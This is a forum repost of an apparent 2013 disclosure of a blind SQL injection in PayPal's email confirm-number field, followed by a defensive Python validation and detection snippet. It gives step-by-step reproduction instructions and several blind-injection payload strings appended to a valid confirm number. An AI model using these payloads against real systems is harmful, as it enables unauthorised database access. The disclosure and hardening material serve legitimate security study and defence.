#1
Old 23.01.2013, 01:00
Kontik
Forum member
Registered: 25.11.2010
Posts: 190

Reputation: -10

Paypal.com Blind SQL Injection

The blind SQL injection vulnerability can be exploited by remote attackers with a low-privileged application user account and
without required user interaction. For demonstration or to reproduce ...

URL1: Request a Session with 2 different mails (Step1)
https://www.paypal.com/de/ece/cn=060...iliuty-lab.com
https://www.paypal.com/de/ece/cn=060...x445@gmail.com

URL2: Injection into ID Confirm Field (Step2)
https://www.paypal.com/de/cgi-bin/we...ssword-submit&
dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f01 84a5674430f290db9e9c846

1. Open the PayPal website and log in as a standard user with a restricted account
2. Switch to the webscr > Confirm Email module of the application
3. Request a login confirm ID when processing to load a reset
4. Take the valid confirm number from the mail and insert it into the email confirm number verification module input fields
5. Switch to the last char of the valid confirm number in the input field and inject own SQL commands as a check to prove the validation

Test Strings:
-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'
-1'+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1--1'
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=-1'

6. Normally the website with the generated ID confirm button is bound to the standard template.
7. Inject substrings with the ID -1+sql-query to prove blind injections in the input field
8. The bottom bar gets loaded as the result of the successfully executed SQL query
9. Now, the remote attacker can manipulate the PayPal core database with a valid confirm number + his own SQL commands

Bug Type: Blind SQL INJECTION
SESSION: DE - 22:50 -23:15 (paypal.com)
Browser: Mozilla Firefox 18.01

PoC:

Please enter it here

Note: Always send all requests with the ID to reproduce the issue. (-) is not possible as the first char of the input request.

Example(Wrong): -1+[SQL-Injection]&06021484023183514599
Example(Right): 06021484023183514599-1+[SQL-Injection]--
Example(Right): 06021484023183514599-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'-1'--

Note:
After the injection was successful 2 times because of my check, the PayPal website opened a security issue report message box as exception handling.
I included the details and information of my test and explained the issue, and a short time later it was patched.
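A defender-side check for the confirm-number field the post describes, added here as an example (not PayPal's code and not from the post): the field is validated against an allow-list, the value is bound as a query parameter, and decoded input is screened for SQL syntax so attempts like the post's test strings can be logged. The 20-digit format (taken from the post's example value), the table layout and the sample email are assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Assumption: a confirm number is exactly 20 ASCII digits, as in the post's example value.
CONFIRM_NUMBER_RE = re.compile(r"[0-9]{20}")
# Tokens that never belong in a numeric confirm number; used only for logging/alerting.
SUSPECT_RE = re.compile(r"(?i)['\";#]|--|\b(and|or|if|select|union|version)\b")
# Constructed sample values: the post's valid number and its "Example(Right)" test string.
VALID_NUMBER = "06021484023183514599"
POST_PAYLOAD = "06021484023183514599-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'-1'--"


def is_valid_confirm_number(value: str) -> bool:
    """Allow-list check: accept exactly 20 digits and nothing else."""
    return CONFIRM_NUMBER_RE.fullmatch(value) is not None


def looks_like_injection(raw_value: str) -> bool:
    """Detection signal for the application or WAF log: decode the form field the way
    the server would (+ becomes a space) and look for SQL syntax glued onto the number."""
    return SUSPECT_RE.search(unquote_plus(raw_value)) is not None


def unsafe_sql(raw_value: str) -> str:
    """The statement string concatenation would hand the database (built here, never executed)."""
    return "SELECT email FROM email_confirm WHERE confirm_id = '" + unquote_plus(raw_value) + "'"


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the confirm-number store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE email_confirm (confirm_id TEXT PRIMARY KEY, email TEXT)")
    conn.execute("INSERT INTO email_confirm VALUES (?, ?)", (VALID_NUMBER, "user@example.test"))
    return conn


def hardened_lookup(conn: sqlite3.Connection, raw_value: str):
    """Validate at the boundary first, then bind the value so it can only ever be data."""
    value = unquote_plus(raw_value)
    if not is_valid_confirm_number(value):
        return None
    row = conn.execute("SELECT email FROM email_confirm WHERE confirm_id = ?", (value,)).fetchone()
    return row[0] if row else None
```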